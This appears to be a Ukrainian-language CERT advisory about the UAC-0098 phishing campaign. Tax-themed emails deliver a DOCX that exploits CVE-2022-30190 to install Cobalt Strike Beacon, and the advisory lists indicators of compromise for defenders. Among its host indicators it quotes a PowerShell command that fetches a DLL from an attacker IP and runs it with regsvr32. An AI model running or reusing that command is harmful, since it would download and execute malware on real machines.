Загальна інформація
Виявлено шкідливий документ "Накладення штрафних санкцій.docx" відкриття якого призведе до завантаження HTML-файлу та виконання JavaScript-коду (CVE-2022-30190), який забезпечить завантаження та запуск шкідливої програми Cobalt Strike Beacon (дата компіляції: 16.06.2022).
У взаємодії з суб'єктом координації з'ясовано, що згаданий DOCX-документ містився в захищеному паролем архіві "НакладенняШтрафнихСанкцiй.zip", який, в свою чергу, розповсюджувався засобами електронної пошти, начебто, від імені "Державної податкової служби України" (тема листа: "Повідомлення про несплату податку").
Активність має персистентний характер та відстежується за ідентифікатором UAC-0098.
Індикатори компрометації
Файли:
37c7b934661f31e526ffb31f7c935d5a 7d53782fab972b8b70c6c7134598da25fd125c58c88a6d468464cee6c9dbe764 НакладенняШтрафнихСанкцiй.zip a3f3402656fc5be4439899b2a5f25eb6 bc6898f0e66582ab92307809a409797749b49948fc265767579b224755b0a17b Накладення штрафних санкцій.docx 85851e09b368ebba90f5d922cd77f348 02b77a482120b7997f06da67f33cdb286ab06b7ef1bd9dfb2ad77a634595abfe index.html 52f371a4f06f3398a5a361335920618c 394cbab9eb87ef8ee795d184137ac2634b22a0a3e642534a55c1623a813c8a59 ked.dll (Cobalt Strike Beacon)
Мережеві:
rostyslav.nal0g@gmail[.]com hXXp://64[.]190.113.51:8000/index[.]html hXXp://5[.]199.173.152/ked[.]dll hXXps://baidenfree[.]com/jquery-3.3.1.min.js baidenfree[.]com golgba[.]com domtern[.]com jorgava[.]com 185[.]143.223.29 (Received) 64[.]190.113.51 5[.]199.173.152 5[.]199.174.219 185[.]170.144.159 87[.]251.64.5 185[.]170.144.158
Хостові:
Invoke-WebRequest -Uri 'http://5.199.173.152/ked.dll' -OutFile 'c:\windows\tasks\ked.dll'; start-process regsvr32.exe -ArgumentList '/s C:\windows\tasks\ked.dll' C:\windows\tasks\ked.dll
Графічні зображення
Всі новини на тему кібератаки дивиться за посиланням.
***